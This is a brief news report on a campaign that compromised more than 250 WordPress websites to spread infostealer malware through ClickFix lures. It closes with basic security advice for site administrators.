A recent cyber-criminal campaign has compromised more than 250 legitimate WordPress websites, allowing the spread of infostealer malware designed to steal sensitive information from visitors. Active since December 2025, attackers target websites in at least 12 countries, leveraging user trust to deploy malicious ClickFix attacks that trick users into executing harmful code. Threat researchers at Rapid7 suggest potential vulnerabilities in WordPress plugins or themes as the point of entry for attackers.
Recommendations for site administrators include regular software updates, strong password protocols, enabling two-factor authentication, and avoiding running untrusted code.